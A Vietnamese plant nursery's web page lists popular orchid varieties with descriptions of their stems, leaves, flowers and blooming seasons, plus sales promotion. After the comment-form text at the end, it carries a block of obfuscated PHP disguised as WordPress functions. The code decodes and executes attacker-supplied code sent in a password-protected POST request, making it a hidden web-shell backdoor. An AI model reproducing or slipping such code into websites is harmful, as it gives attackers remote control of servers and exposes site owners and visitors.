Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Với những người chơi hoa thì một trong những loại bông được yêu thích và ưa chuộng nhất chính là hoa phong lan. Tuy nhiên, với sự đa dạng về giống loại thì không phải ai cũng nhận biết được hết các loại hoa phong lan khác nhau.

 

Chính vì vậy, bài viết dưới đây của https://vuoncayhoabinh.com  sẽ nêu ra những đặc điểm riêng biệt để giúp cho các bạn có thể nhận biết các loại hoa phong lan một cách dễ dàng! Hãy cùng đọc bài viết dưới đây để có thông tin chi tiết nhé!

 

Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất

Tìm hiểu qua về hoa phong lan

 

Hoa phong lan có nguồn gốc từ các khu rừng nhiệt đới ở Nam Mỹ và các dãy Himalaya thuộc châu Á. Nhưng trên thực tế thì hiện nay, loài hoa này đã mọc phổ biến ở khắp mọi nơi.

 

Cây hoa phong lan có dạng thân bám, chúng thường hút các chất dinh dưỡng từ cây chủ để sinh sôi và phát triển. Hoa thường có dạng chum rủ xuống và đa dạng màu sắc khác nhau.

 

Như đã nói, lan là một trong những loài hoa đa dạng về nguồn gốc, chủng loại. Nhưng nhìn chung, lan được phân chia thành 3 loại chính theo môi trường sống: địa lan mọc dưới đất hoặc trong cá thể gần với đất,  phong lan sống trong không khí và bán địa lan chính là loài có thể sống trong cả đất và không khí.

 

Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất

Ý nghĩa của hoa phong lan

 

Chính vẻ đẹp và hương thơm của phong lan đã mang cho nó nét phong thái của một loài hoa quý. Chính vì vậy, một trong những nét người ta miêu tả về lan là đài các, kiêu sa và quý phái. Nó đại diện cho vẻ đẹp của tình yêu, sự sang trọng.

 

Với đa dạng màu sắc, phong lan cũng mang theo những ý nghĩa riêng nhưng trong đó, những bông hoa trắng chính là biểu tượng cho sự chân thành, lòng tốt và sự thật. Do đó, hoa lan dù được chọn dùng để tặng quà hay mua về trang trí đều rất thích hợp.

 

Nhận biết các loại hoa phong lan

 

Dưới đây, chúng tôi sẽ liệt kê ra các loại hoa phong lan phổ biến nhất giúp các bạn có thể tiện theo dõi:

 

  1. Lan hồ điệp

Đây chính là một trong những loài lan phổ biến nhất nước ta hiện nay với dáng cây đẹp, hoa to cùng màu sắc rực rỡ và đa dạng. Hoa thường nở vào cuối đông sang mùa xuân năm sau.

 

Nếu là lan hồ điệp rừng thì khác với các giống lan lai là thân thường nhỏ, hoa nhỏ, cụm hoa ngắn. Lá lan hồ điệp dày, bình bầu dục. Chúng có xuất xứ từ vùng thấp hay cao trung bình nhưng hầu hết đều là loài dễ trồng và ra hoa.

 

Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
  1. Lan Hoàng Thảo Kèn

Đây là loại lan rừng được đánh giá là đẹp và quý nhất tại Việt Nam.

 

Thân cây mềm hình trụ, căng tròn, nhẵn bóng và thon dần về phía ngọn cây. Khi trưởng thành, cây có chiều dài khoảng 50 – 80cm. Lá lan hoàng thảo kèn thường hẹp, thuôn dài. Bông lan có màu tím chuyển từ đậm sang nhạt rất độc đáo.

  1. Lan Trầm Tím

Đây là loài hoa được Veitch lai tạo từ giống cây Phi Điệp (giả hạc) và cây Song Hồng, hoàng thảo tím.

 

Thân cây hơi ngắn có chiều hướng lên thẳng. Hoa có màu tím hồng cùng hương thơm nhẹ nhàng như hương trầm. Hoa lan trầm tím sống rất bền và khỏe, nó phù hợp với thời tiết của mọi miền.

 

Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
  1. Hoa lan đơn cam

Hoa lan đơn cam có sáp cánh hoa và đài hoa màu đỏ cam với một môi màu cam nhạt. Lan sống phụ sinh, nhỏ và chỉ cao khoảng 10 -15cm. Lá lan thuôn hẹp, dài 5 – 6cm và rộng khoảng dưới 1cm. Cụm hoa ngắn có 2,3 hoa màu cam đậm hay đỏ như san hô.

 

  1. Lan giả hạc

Lan giả hạc có đặc điểm là thường sống bám trên các cành cây ở độ cao khoảng 1000 – 1300m tại các khu rừng. Thân cây hoa dài tới 1.2m và buông rủ xuống.

 

Lá hoa mọc đối nhau dài từ 8 – 12cm, rộng từ 4 – 7cm. Bông hoa to, mọc ở các đốt đã rụng lá và thường nở vào dịp Tết. Hai màu chính của hoa là tím hồng và trắng. Ngoài ra hiện nay, nó cũng có những biến dạng hồng nhạt, hồng thẫm hoặc cánh trắng lưỡi tím.

 

Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
  1. Lan ngọc điểm

Đây chính là loài hoa phổ biến nhất ở Việt Nam được trồng rộng khắp, đặc biệt là vào dịp Tết cổ truyền. Bởi hoa luôn nở vào tháng 12 âm lịch (trừ năm nhuận), vì thế nên lan ngọc điểm được dùng để trang trí vào dịp Tết.

 

Lan ngọc điểm thuộc nhóm đơn thân và có rất nhiều rễ cây mọc thẳng từ thân. Lá cây màu tím nhạt và chút ánh trắng, rũ xuống theo mặt đất.

 

  1. Lan thủy tiên tím

 

Đây là loài lan rừng được mọi người yêu thích, bởi tính dễ trồng cùng màu sắc đa dạng.

 

Chúng thuộc loài cây giả hành lớn, lá cây mọc so le từ khoảng thân đến ngọn. Thân cây cao chừng 30 – 60cm (có khi tới 80cm) và đặc biệt là cây không rụng lá. Hoa thủy tiên được mọc từ gốc lá, các đốt gần ngọn, nở thành chùm. Phát hoa có màu tím, cánh trắng và gọng vàng.

 

Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
Nhận Biết Các Loại Hoa Phong Lan Phổ Biến Nhất
  1. Lan ngọc điểm hải âu

Đây là loài cây có thân ngắn và lá nhỏ hơn. Cụm hoa đứng, dài khoảng 10 – 15cm. Hoa lớn, xếp dày có màu trắng và những đốm lớn màu làm trên đỉnh. Cánh môi màu lam và có gốc trắng. Cây thường ra hoa vào tháng 5 và tháng 6 và nở trong khoảng 1 tuần.

 

Trên đây, chính là những loại phong lan phổ biến và được ưa chuộng nhất với giới sành hoa. Nếu các bạn có nhu cầu tham khảo cũng như lựa chọn cho mình một vài chậu lan đẹp để trang trí, hãy liên hệ ngay với chúng tôi https://vuoncayhoabinh.com  để nhận được tư vấn cũng như hỗ trợ đặt hàng. Với nhiều năm kinh nghiệm trong kinh doanh những dòng cây hàng đầu như: Cây công trình, cây xanh đô thị, cây phong thủy, cây xanh ngoại thất,…Chúng tôi tin có thể mang đến cho không gian sống của bạn những thay đổi tốt nhất.

 

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}